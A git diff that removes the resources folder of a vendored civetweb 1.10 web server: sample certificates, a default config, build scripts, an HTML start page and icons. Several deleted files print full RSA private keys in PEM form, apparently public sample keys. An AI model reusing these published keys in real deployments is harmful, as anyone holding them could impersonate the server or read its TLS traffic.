--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFKfFGF1i10TANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjI1MVoXDTI3MDkwMTE5MjI1MVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-AKTJr3PzWOR1Hrjfk9bBA7TptI1hNYVn/Xvi2GSferhJaWg69b2Li4t5/JxElESR
-8fy0lBMzQ/yaFiQb51y7Q1c+Z6xWLxk322rfy3WhU3DYiFL2sJndrDvAhmso122Z
-xVADA0cQwo520MgFYpHNBF8BcFV2IRukzVX+/nVkki05XcwfbI2y6gqCRpOSXdE9
-gCDVan3tSRbtrwKu7IHy88mL6057o82Uezpl0KesoCwb4f5oqs2vThUmXKuxu8GO
-WpZNK4JFWnTgDOJrubZvKxzzL9E85DS9aXLk6dNKBJVKPCETnYw+2ArMgXzs+JuA
-C4AhV0e6unLX9DcavZ6j7JcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAJJWqVuQs
-guFZG/LZPeeh1WtZr9S6R5BT4+b+PH2teVyGtClXV6KpwcLNEVWzY3qPtrFFPQI1
-uEg6cY8w1JOiCmj/IWKsiHd+IdsqsFVKL+Bmvthm3HSgA6p6ZiVCG4E67p8xwiJP
-p5EwtMM/7BdS/tHLUOe1OpNZ8XtHRVUNbzy/+JV0So7WLP9ksGb6COL/9MF0/qG4
-4XrrvpZ9FAgRC9/22QyYiQqoaegGEy4E+KHOBxRmipInsU2H8aQA2sZzQ49Zew9E
-QI2jSJTC7EeuZ0OcZawKkJY1ZtIGmOo/Q956keOLdG8cxyq6pXW3gmq1X5QBxy1M
-pZYi5eIENGE63g==
------END CERTIFICATE-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.csr b/thirdparty/civetweb-1.10/resources/cert/server_bkup.csr
deleted file mode 100644
index c866b57..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.csr
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN CERTIFICATE REQUEST-----
-MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
-ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
-AQEBBQADggEPADCCAQoCggEBAKTJr3PzWOR1Hrjfk9bBA7TptI1hNYVn/Xvi2GSf
-erhJaWg69b2Li4t5/JxElESR8fy0lBMzQ/yaFiQb51y7Q1c+Z6xWLxk322rfy3Wh
-U3DYiFL2sJndrDvAhmso122ZxVADA0cQwo520MgFYpHNBF8BcFV2IRukzVX+/nVk
-ki05XcwfbI2y6gqCRpOSXdE9gCDVan3tSRbtrwKu7IHy88mL6057o82Uezpl0Kes
-oCwb4f5oqs2vThUmXKuxu8GOWpZNK4JFWnTgDOJrubZvKxzzL9E85DS9aXLk6dNK
-BJVKPCETnYw+2ArMgXzs+JuAC4AhV0e6unLX9DcavZ6j7JcCAwEAAaAAMA0GCSqG
-SIb3DQEBCwUAA4IBAQBvbql7sAA8XOwsszRUzOCLkFxfDsWJ0l5re2mGgHTEd5hc
-eDfM+Vdy8SVZX9OySdioVD6ACTse3rc1ULYn8jj1wvOd3/z/J9aUBcBACJG5D1Dl
-+j+xvfhvgAGCEQn7ZMaWLFWrLs++aQ+EKbl0SypEI2rTJkyZlYSDVpa+LhqX4UOa
-+RNlq1CX+85HCjBn0sWBNzhjrf3gwERRn5NfTab4FqwqGp2+s4GvbOJHrm8saMWu
-BlhcTzGGLBRKCQUHo5i9393b3oBOqtcpWPcZGhyAF1NUbYL7USnsiH6lkGReeaFi
-xy7vYmUn9j//vT64SmASG0oF+ecUF0q2W42sSqnU
------END CERTIFICATE REQUEST-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.key b/thirdparty/civetweb-1.10/resources/cert/server_bkup.key
deleted file mode 100644
index 235c83a..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEApMmvc/NY5HUeuN+T1sEDtOm0jWE1hWf9e+LYZJ96uElpaDr1
-vYuLi3n8nESURJHx/LSUEzND/JoWJBvnXLtDVz5nrFYvGTfbat/LdaFTcNiIUvaw
-md2sO8CGayjXbZnFUAMDRxDCjnbQyAVikc0EXwFwVXYhG6TNVf7+dWSSLTldzB9s
-jbLqCoJGk5Jd0T2AINVqfe1JFu2vAq7sgfLzyYvrTnujzZR7OmXQp6ygLBvh/miq
-za9OFSZcq7G7wY5alk0rgkVadOAM4mu5tm8rHPMv0TzkNL1pcuTp00oElUo8IROd
-jD7YCsyBfOz4m4ALgCFXR7q6ctf0Nxq9nqPslwIDAQABAoIBAE/B7lHIrnWk2kHQ
-tNV0hj7B/smPC0COnHmhyeqp5dPcdFAmeVpMeDYBzOo1py2pFd6h6CmC3p0cVysS
-9mBDosxPQA6BiDpEdsa7mtZMRv6PTywYilFuoTYqcOTc16gMjRu02ZlD22boyxSE
-xria6kqxf5Vdn5ipo1jEGpTnIHkSS+Y8CetCaYgcezLaXlXN3RyjF6tCHMeS3iLl
-/zY2O4avG2BM+vvDGDW2FWtZg+hN+5Yk90Qt8dFTwvWRCfYaSWfi7id91p5X0rnL
-x1G07qw18LziKJj4HZiueqbDcDOYhfcA6sd0OHcvtXfGIoeqkXxi54cIOReRhN2/
-7ib3iUECgYEA2DNH5aiwc5uqTAL9RHTnuuFwQe46onJwnBkho+xEvvdsp2Q2f7VR
-c5M17fL+Rb5gq0O4vzeegKiYpo8gKjFp3Duv9Gdc/TB9sLEEt4NQMD4shV7ihBwC
-Rjsflww45dt0mccFZp1ncDYKWHDFzdhO+WB828FPFh/5dl6S+v4Q9bUCgYEAwx+G
-XhheTMSqoKGVJ283+4bNZWUSE99wcAhx9J3FkJera030mh0OHoCn0myBjRjxOSY/
-eBH8/0YoLkGYvTdEU/tYiLIWJ/ehC0eweXiwDehb5meco6u9WCeYvyPMLErXbe3K
-BQVyfcFzva4eC3dZ7lzxmyVyKXVTYgY0Hf7biJsCgYBKHdJg/eJ3z36jDkdK55Tl
-cRFt2MCLHhZSvR7WNlIe8W1zORyhzUP+DhJn32yh9jDnpZC5JNUWoDWsq9ZIAKac
-1G1uqNytA6mjIBxQ2RhtYXMbybp3ta5l6zDaNFtxGTmw2hSU6BMk2bHUPdzhw2zX
-eudy4qM9H3sCxEs49k5UHQKBgDz7I0FRGFehtznQhg73AWYIsTSZK9cuI7O/z+2F
-SXNxE0/L40AvCHSb/NcUtkBkpS8ZNwjNhmY5hOE/+v5XwXEFwpumHKqNB7XAx/SO
-tWcDUYVmqFu2lsxwQ5qpE2xcT4u5n0OGeku3I/cJ7bXjrSWDwracM1uloVOnYK5n
-MjE1AoGAeM6Wrb0VXRq025+OEfoFis3P9S0REkkkabM9+VLRSWi63uxg2cyipxUg
-qJUThbUm1aSS1F+XWjG7vrDjWT/GQTYj9/CH3mZRflZgLUltVHEZesLwWqn15Gl/
-BDwaV6RN7F3BCSzgEfCutrfGJqxA0tx5TTcupOgwpZVakN+hm3c=
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pem b/thirdparty/civetweb-1.10/resources/cert/server_bkup.pem
deleted file mode 100644
index a409c14..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pem
+++ /dev/null
@@ -1,46 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFKfFGF1i10TANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjI1MVoXDTI3MDkwMTE5MjI1MVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-AKTJr3PzWOR1Hrjfk9bBA7TptI1hNYVn/Xvi2GSferhJaWg69b2Li4t5/JxElESR
-8fy0lBMzQ/yaFiQb51y7Q1c+Z6xWLxk322rfy3WhU3DYiFL2sJndrDvAhmso122Z
-xVADA0cQwo520MgFYpHNBF8BcFV2IRukzVX+/nVkki05XcwfbI2y6gqCRpOSXdE9
-gCDVan3tSRbtrwKu7IHy88mL6057o82Uezpl0KesoCwb4f5oqs2vThUmXKuxu8GO
-WpZNK4JFWnTgDOJrubZvKxzzL9E85DS9aXLk6dNKBJVKPCETnYw+2ArMgXzs+JuA
-C4AhV0e6unLX9DcavZ6j7JcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAJJWqVuQs
-guFZG/LZPeeh1WtZr9S6R5BT4+b+PH2teVyGtClXV6KpwcLNEVWzY3qPtrFFPQI1
-uEg6cY8w1JOiCmj/IWKsiHd+IdsqsFVKL+Bmvthm3HSgA6p6ZiVCG4E67p8xwiJP
-p5EwtMM/7BdS/tHLUOe1OpNZ8XtHRVUNbzy/+JV0So7WLP9ksGb6COL/9MF0/qG4
-4XrrvpZ9FAgRC9/22QyYiQqoaegGEy4E+KHOBxRmipInsU2H8aQA2sZzQ49Zew9E
-QI2jSJTC7EeuZ0OcZawKkJY1ZtIGmOo/Q956keOLdG8cxyq6pXW3gmq1X5QBxy1M
-pZYi5eIENGE63g==
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEApMmvc/NY5HUeuN+T1sEDtOm0jWE1hWf9e+LYZJ96uElpaDr1
-vYuLi3n8nESURJHx/LSUEzND/JoWJBvnXLtDVz5nrFYvGTfbat/LdaFTcNiIUvaw
-md2sO8CGayjXbZnFUAMDRxDCjnbQyAVikc0EXwFwVXYhG6TNVf7+dWSSLTldzB9s
-jbLqCoJGk5Jd0T2AINVqfe1JFu2vAq7sgfLzyYvrTnujzZR7OmXQp6ygLBvh/miq
-za9OFSZcq7G7wY5alk0rgkVadOAM4mu5tm8rHPMv0TzkNL1pcuTp00oElUo8IROd
-jD7YCsyBfOz4m4ALgCFXR7q6ctf0Nxq9nqPslwIDAQABAoIBAE/B7lHIrnWk2kHQ
-tNV0hj7B/smPC0COnHmhyeqp5dPcdFAmeVpMeDYBzOo1py2pFd6h6CmC3p0cVysS
-9mBDosxPQA6BiDpEdsa7mtZMRv6PTywYilFuoTYqcOTc16gMjRu02ZlD22boyxSE
-xria6kqxf5Vdn5ipo1jEGpTnIHkSS+Y8CetCaYgcezLaXlXN3RyjF6tCHMeS3iLl
-/zY2O4avG2BM+vvDGDW2FWtZg+hN+5Yk90Qt8dFTwvWRCfYaSWfi7id91p5X0rnL
-x1G07qw18LziKJj4HZiueqbDcDOYhfcA6sd0OHcvtXfGIoeqkXxi54cIOReRhN2/
-7ib3iUECgYEA2DNH5aiwc5uqTAL9RHTnuuFwQe46onJwnBkho+xEvvdsp2Q2f7VR
-c5M17fL+Rb5gq0O4vzeegKiYpo8gKjFp3Duv9Gdc/TB9sLEEt4NQMD4shV7ihBwC
-Rjsflww45dt0mccFZp1ncDYKWHDFzdhO+WB828FPFh/5dl6S+v4Q9bUCgYEAwx+G
-XhheTMSqoKGVJ283+4bNZWUSE99wcAhx9J3FkJera030mh0OHoCn0myBjRjxOSY/
-eBH8/0YoLkGYvTdEU/tYiLIWJ/ehC0eweXiwDehb5meco6u9WCeYvyPMLErXbe3K
-BQVyfcFzva4eC3dZ7lzxmyVyKXVTYgY0Hf7biJsCgYBKHdJg/eJ3z36jDkdK55Tl
-cRFt2MCLHhZSvR7WNlIe8W1zORyhzUP+DhJn32yh9jDnpZC5JNUWoDWsq9ZIAKac
-1G1uqNytA6mjIBxQ2RhtYXMbybp3ta5l6zDaNFtxGTmw2hSU6BMk2bHUPdzhw2zX
-eudy4qM9H3sCxEs49k5UHQKBgDz7I0FRGFehtznQhg73AWYIsTSZK9cuI7O/z+2F
-SXNxE0/L40AvCHSb/NcUtkBkpS8ZNwjNhmY5hOE/+v5XwXEFwpumHKqNB7XAx/SO
-tWcDUYVmqFu2lsxwQ5qpE2xcT4u5n0OGeku3I/cJ7bXjrSWDwracM1uloVOnYK5n
-MjE1AoGAeM6Wrb0VXRq025+OEfoFis3P9S0REkkkabM9+VLRSWi63uxg2cyipxUg
-qJUThbUm1aSS1F+XWjG7vrDjWT/GQTYj9/CH3mZRflZgLUltVHEZesLwWqn15Gl/
-BDwaV6RN7F3BCSzgEfCutrfGJqxA0tx5TTcupOgwpZVakN+hm3c=
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pin b/thirdparty/civetweb-1.10/resources/cert/server_bkup.pin
deleted file mode 100644
index 0e05612..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pin
+++ /dev/null
@@ -1 +0,0 @@
-pf3px1MBPmlTGAPoiHWqaSJ9L9Z+DKfwgsU7LfLnmsk=
diff --git a/thirdparty/civetweb-1.10/resources/civetweb.conf b/thirdparty/civetweb-1.10/resources/civetweb.conf
deleted file mode 100644
index 00aacde..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb.conf
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb web server configuration file.
-# For detailed description of every option, visit
-# https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md
-# Lines starting with '#' and empty lines are ignored.
-# To make a change, remove leading '#', modify option's value,
-# save this file and then restart Civetweb.
-
-document_root .
-listening_ports 8080
-
-# cgi_pattern **.cgi$|**.pl$|**.php$
-# cgi_environment 
-# put_delete_auth_file 
-# cgi_interpreter 
-# protect_uri 
-# authentication_domain mydomain.com
-# ssi_pattern **.shtml$|**.shtm$
-# throttle 
-# access_log_file 
-# enable_directory_listing yes
-# error_log_file 
-# global_auth_file 
-# index_files index.html,index.htm,index.cgi,index.shtml,index.php,index.lp
-# enable_keep_alive no
-# access_control_list 
-# extra_mime_types 
-# ssl_certificate 
-# num_threads 50
-# run_as_user 
-# url_rewrite_patterns 
-# hide_files_patterns 
-# request_timeout_ms 30000
diff --git a/thirdparty/civetweb-1.10/resources/civetweb.icns b/thirdparty/civetweb-1.10/resources/civetweb.icns
deleted file mode 100644
index af1f121..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb.icns
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb.psd b/thirdparty/civetweb-1.10/resources/civetweb.psd
deleted file mode 100644
index accbe31..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb.psd
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_16x16.png b/thirdparty/civetweb-1.10/resources/civetweb_16x16.png
deleted file mode 100644
index 10ea1d2..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_16x16.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_16x16@2.png b/thirdparty/civetweb-1.10/resources/civetweb_16x16@2.png
deleted file mode 100644
index 7621fb1..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_16x16@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_22x22.png b/thirdparty/civetweb-1.10/resources/civetweb_22x22.png
deleted file mode 100644
index f0b9094..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_22x22.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_22x22@2.png b/thirdparty/civetweb-1.10/resources/civetweb_22x22@2.png
deleted file mode 100644
index bdb3614..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_22x22@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_32x32.png b/thirdparty/civetweb-1.10/resources/civetweb_32x32.png
deleted file mode 100644
index 62471e3..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_32x32.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_32x32@2.png b/thirdparty/civetweb-1.10/resources/civetweb_32x32@2.png
deleted file mode 100644
index e192a45..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_32x32@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_64x64.png b/thirdparty/civetweb-1.10/resources/civetweb_64x64.png
deleted file mode 100644
index bc8b995..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_64x64.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_64x64@2.png b/thirdparty/civetweb-1.10/resources/civetweb_64x64@2.png
deleted file mode 100644
index d6ad7b4..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_64x64@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/coverity_check.sh b/thirdparty/civetweb-1.10/resources/coverity_check.sh
deleted file mode 100755
index 063d7c8..0000000
--- a/thirdparty/civetweb-1.10/resources/coverity_check.sh
+++ /dev/null
@@ -1,60 +0,0 @@
-#! /bin/sh
-
-# check if we use the correct directory
-ls src/civetweb.c
-if [ "$?" = "0" ]; then
-	echo "Building files for coverity check ..."
-else
-	echo "Run this script from the root directory of project!" 1>&2
-	echo "username@hostname:/somewhere/civetweb$ ./resources/coverity_check.sh" 1>&2
-	exit 1
-fi
-
-# remove last build
-rm -rf cov_build/
-
-# copy files to build folder
-mkdir cov_build
-mkdir cov_build/src
-mkdir cov_build/include
-mkdir cov_build/resources
-
-cp Makefile cov_build/
-cp src/*.c cov_build/src/
-cp src/*.inl cov_build/src/
-cp include/civetweb.h cov_build/include/
-cp resources/Makefile.in-os cov_build/resources/
-
-cd cov_build
-
-# new scan build
-../../cov-analysis-linux64-8.7.0/bin/cov-build  --dir cov-int make WITH_IPV6=1 WITH_WEBSOCKET=1 WITH_SERVER_STATS=1
-
-
-# pack build results for upload
-tar czvf civetweb_coverity_check.tgz cov-int
-
-cd ..
-
-# check if the build was successful
-echo
-ls -la cov_build/civetweb_coverity_check.tgz
-
-if [ "$?" = "0" ]; then
-	echo "... done"
-	echo
-        echo "submit to https://scan.coverity.com/projects/bel2125-civetweb"
-	echo
-	echo "last commit was"
-	git log -n 1
-        echo
-        echo
-else
-	echo "No civetweb_coverity_check.tgz file" 1>&2
-        echo
-	exit 1
-fi
-
-# return "ok"
-exit 0
-
diff --git a/thirdparty/civetweb-1.10/resources/duktape-logo.png b/thirdparty/civetweb-1.10/resources/duktape-logo.png
deleted file mode 100644
index afdc0f8..0000000
--- a/thirdparty/civetweb-1.10/resources/duktape-logo.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/itworks.html b/thirdparty/civetweb-1.10/resources/itworks.html
deleted file mode 100644
index cba3bad..0000000
--- a/thirdparty/civetweb-1.10/resources/itworks.html
+++ /dev/null
@@ -1,23 +0,0 @@
-<html>
-<head>
-<title>Civetweb: It Works!</title>
-</head>
-<body>
-<div style="float:right; width:100%; text-align:center;">
-</div>
-<div style="float:left; height:50%; margin-bottom:-200px;"></div>
-<div style="clear:both; height:400px; width:400px; margin: auto; position:relative;">
-<img src="civetweb_64x64.png" alt="logo"/>
-<p>
-<b style="font-size:larger"><a style="text-decoration:none" href="https://sourceforge.net/projects/civetweb/">Civetweb</a></b><br>
-<i>Your web server</i>
-<ul>
-<li><a href="https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md">User Manual</a></li>
-<li><a href="https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md">Release Notes</a></li>
-<li><a href="https://sourceforge.net/projects/civetweb/">Downloads</a></li>
-<li><a href="https://github.com/civetweb/civetweb">GitHub</a></li>
-</ul>
-</p>
-</div>
-</body>
-</html>
diff --git a/thirdparty/civetweb-1.10/resources/jni/Android.mk b/thirdparty/civetweb-1.10/resources/jni/Android.mk
deleted file mode 100644
index f24981a..0000000
--- a/thirdparty/civetweb-1.10/resources/jni/Android.mk
+++ /dev/null
@@ -1,6 +0,0 @@
-LOCAL_PATH := $(call my-dir)/../..
-include $(CLEAR_VARS)
-LOCAL_CFLAGS    := -std=c99 -O2 -W -Wall -pthread -pipe $(COPT)
-LOCAL_MODULE    := civetweb
-LOCAL_SRC_FILES := src\main.c src\civetweb.c
-include $(BUILD_EXECUTABLE)
diff --git a/thirdparty/civetweb-1.10/resources/lua-logo.jpg b/thirdparty/civetweb-1.10/resources/lua-logo.jpg
deleted file mode 100644
index 67de666..0000000
--- a/thirdparty/civetweb-1.10/resources/lua-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/luafilesystem-logo.jpg b/thirdparty/civetweb-1.10/resources/luafilesystem-logo.jpg
deleted file mode 100644
index 4a2e855..0000000
--- a/thirdparty/civetweb-1.10/resources/luafilesystem-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/luasqlite-logo.jpg b/thirdparty/civetweb-1.10/resources/luasqlite-logo.jpg
deleted file mode 100644
index 9388126..0000000
--- a/thirdparty/civetweb-1.10/resources/luasqlite-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/luaxml-logo.jpg b/thirdparty/civetweb-1.10/resources/luaxml-logo.jpg
deleted file mode 100644
index 9916f6e..0000000
--- a/thirdparty/civetweb-1.10/resources/luaxml-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/mingw.bat b/thirdparty/civetweb-1.10/resources/mingw.bat
deleted file mode 100644
index 8703266..0000000
--- a/thirdparty/civetweb-1.10/resources/mingw.bat
+++ /dev/null
@@ -1,15 +0,0 @@
-@rem MinGW build test - used to test MinGW builds locally

-@rem Adapt path/versions before use

-

-@rem This batch file must be used from the repository root

-@if exist mingw.bat cd ..

-

-

-@set PATH=%ProgramFiles%\mingw-w64\i686-4.9.2-win32-dwarf-rt_v3-rev1\mingw32\bin;%PATH%

-@set PATH=%ProgramFiles%\GnuWin32\bin;%PATH%

-

-@rem Alternative ways to use mingw

-@rem make CC=gcc CFLAGS=-w CFLAGS+=-Iinclude/ CFLAGS+=-lws2_32 CFLAGS+=-liphlpapi

-@rem gcc src\civetweb.c src\main.c -Iinclude\ -lws2_32 -lpthread -lcomdlg32 -w

-

-make build CC=gcc WITH_LUA=1 WITH_WEBSOCKET=1

diff --git a/thirdparty/civetweb-1.10/resources/res.rc b/thirdparty/civetweb-1.10/resources/res.rc
deleted file mode 100644
index 38a80bb..0000000
--- a/thirdparty/civetweb-1.10/resources/res.rc
+++ /dev/null
@@ -1 +0,0 @@
-100 ICON DISCARDABLE "systray.ico"
diff --git a/thirdparty/civetweb-1.10/resources/sqlite3-logo.jpg b/thirdparty/civetweb-1.10/resources/sqlite3-logo.jpg
deleted file mode 100644
index 14b01df..0000000
--- a/thirdparty/civetweb-1.10/resources/sqlite3-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/ssl_cert.pem b/thirdparty/civetweb-1.10/resources/ssl_cert.pem
deleted file mode 100644
index f7e15a0..0000000
--- a/thirdparty/civetweb-1.10/resources/ssl_cert.pem
+++ /dev/null
@@ -1,50 +0,0 @@
------BEGIN RSA PRIVATE KEY-----

-MIIEogIBAAKCAQEAwONaLOP7EdegqjRuQKSDXzvHmFMZfBufjhELhNjo5KsL4ieH

-hMSGCcSV6y32hzhqR5lvTViaQez+xhc58NZRu+OUgEhodRBW/vAOjpz/xdMz5HaC

-EhP3E9W1pkitVseS8B5rrgJo1BfCGai1fPav1nutPq2Kj7vMy24+g460Lonf6ln1

-di4aTIRtAqXtUU6RFpPJP35PkCXbTK65O8HJSxxt/XtfoezHCU5+UIwmZGYx46UB

-Wzg3IfK6bGPSiHU3pdiTol0uMPt/GUK+x4NyZJ4/ImsNAicRwMBdja4ywHKXJehH

-gXBthsVIHbL21x+4ibsg9eVM/XioTV6tW3IrdwIDAQABAoIBACFfdLutmkQFBcRN

-HAJNNHmmsyr0vcUOVnXTFyYeDXV67qxrYHQlOHe6LqIpKq1Mon7O2kYMnWvooFAP

-trOnsS6L+qaTYJdYg2TKjgo4ubw1hZXytyB/mdExuaMSkgMgtpia+tB5lD+V+LxN

-x1DesZ+veFMO3Zluyckswt4qM5yVa04YFrt31H0E1rJfIen61lidXIKYmHHWuRxK

-SadjFfbcqJ6P9ZF22BOkleg5Fm5NaxJmyQynOWaAkSZa5w1XySFfRjRfsbDr64G6

-+LSG8YtRuvfxnvUNhynVPHcpE40eiPo6v8Ho6yZKXpV5klCKciodXAORsswSoGJa

-N3nnu/ECgYEA6Yb2rM3QUEPIALdL8f/OzZ1GBSdiQB2WSAxzl9pR/dLF2H+0pitS

-to0830mk92ppVmRVD3JGxYDRZQ56tlFXyGaCzJBMRIcsotAhBoNbjV0i9n5bLJYf

-BmjU9yvWcgsTt0tr3B0FrtYyp2tCvwHqlxvFpFdUCj2oRw2uGpkhmNkCgYEA03M6

-WxFhsix3y6eVCVvShfbLBSOqp8l0qiTEty+dgVQcWN4CO/5eyaZXKxlCG9KMmKxy

-Yx+YgxZrDhfaZ0cxhHGPRKEAxM3IKwT2C8/wCaSiLWXZZpTifnSD99vtOt4wEfrG

-+AghNd5kamFiM9tU0AyvhJc2vdJFuXrfeC7ntM8CgYBGDA+t4cZcbRhu7ow/OKYF

-kulP3nJgHP/Y+LMrl3cEldZ2jEfZmCElVNQvfd2XwTl7injhOzvzPiKRF3jDez7D

-g8w0JAxceddvttJRK9GoY4l7OoeKpjUELSnEQkf+yUfOsTbXPXVY7jMfeNL6jE6b

-qN7t3qv8rmXtejMBE3G6cQKBgGR5W2BMiRSlxqKx1cKlrApV87BUe1HRCyuR3xuA

-d6Item7Lx1oEi7vb242yKdSYnpApWQ06xTh83Y/Ly87JaIEbiM0+h+P8OEIg0F1a

-iB+86AcUX1I8KseVy+Np0HbpfwP8GrFfA5DaRPK7pXMopEtby8cAJ1XZZaI1/ZvZ

-BebHAoGAcQU9WvCkT+nIp9FpXfBybYUsvgkaizMIqp66/l3GYgYAq8p1VLGvN4v5

-ec0dW58SJrCpqsM3NP78DtEzQf9OOsk+FsjBFzDU2RkeUreyt2/nQBj/2mN/+hEy

-hYN0Zii2yTb63jGxKY6gH1R/r9dL8kXaJmcZrfSa3AgywnteJWg=

------END RSA PRIVATE KEY-----

------BEGIN CERTIFICATE-----

-MIIDBjCCAe4CCQCX05m0b053QzANBgkqhkiG9w0BAQQFADBFMQswCQYDVQQGEwJB

-VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0

-cyBQdHkgTHRkMB4XDTA4MTIwNzEwMjUyMloXDTE4MTIwNTEwMjUyMlowRTELMAkG

-A1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0

-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB

-AMDjWizj+xHXoKo0bkCkg187x5hTGXwbn44RC4TY6OSrC+Inh4TEhgnElest9oc4

-akeZb01YmkHs/sYXOfDWUbvjlIBIaHUQVv7wDo6c/8XTM+R2ghIT9xPVtaZIrVbH

-kvAea64CaNQXwhmotXz2r9Z7rT6tio+7zMtuPoOOtC6J3+pZ9XYuGkyEbQKl7VFO

-kRaTyT9+T5Al20yuuTvByUscbf17X6HsxwlOflCMJmRmMeOlAVs4NyHyumxj0oh1

-N6XYk6JdLjD7fxlCvseDcmSePyJrDQInEcDAXY2uMsBylyXoR4FwbYbFSB2y9tcf

-uIm7IPXlTP14qE1erVtyK3cCAwEAATANBgkqhkiG9w0BAQQFAAOCAQEAW4yZdqpB

-oIdiuXRosr86Sg9FiMg/cn+2OwQ0QIaA8ZBwKsc+wIIHEgXCS8J6316BGQeUvMD+

-plNe0r4GWzzmlDMdobeQ5arPRB89qd9skE6pAMdLg3FyyfEjz3A0VpskolW5VBMr

-P5R7uJ1FLgH12RyAjZCWYcCRqEMOffqvyMCH6oAjyDmQOA5IssRKX/HsHntSH/HW

-W7slTcP45ty1b44Nq22/ubYk0CJRQgqKOIQ3cLgPomN1jNFQbAbfVTaK1DpEysrQ

-5V8a8gNW+3sVZmV6d1Mj3pN2Le62wUKuV2g6BNU7iiwcoY8HI68aRxz2hVMS+t5f

-SEGI4JSxV56lYg==

------END CERTIFICATE-----

------BEGIN DH PARAMETERS-----

-MEYCQQD+ef8hZ4XbdoyIpJyCTF2UrUEfX6mYDvxuS5O1UNYcslUqlj6JkA11e/yS

-6DK8Z86W6mSj5CEk4IjbyEOECXH7AgEC

------END DH PARAMETERS-----

diff --git a/thirdparty/civetweb-1.10/resources/systray.ico b/thirdparty/civetweb-1.10/resources/systray.ico
deleted file mode 100644
index 380c0ee..0000000
--- a/thirdparty/civetweb-1.10/resources/systray.ico
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/src/CMakeLists.txt b/thirdparty/civetweb-1.10/src/CMakeLists.txt
deleted file mode 100644
index f01f66c..0000000
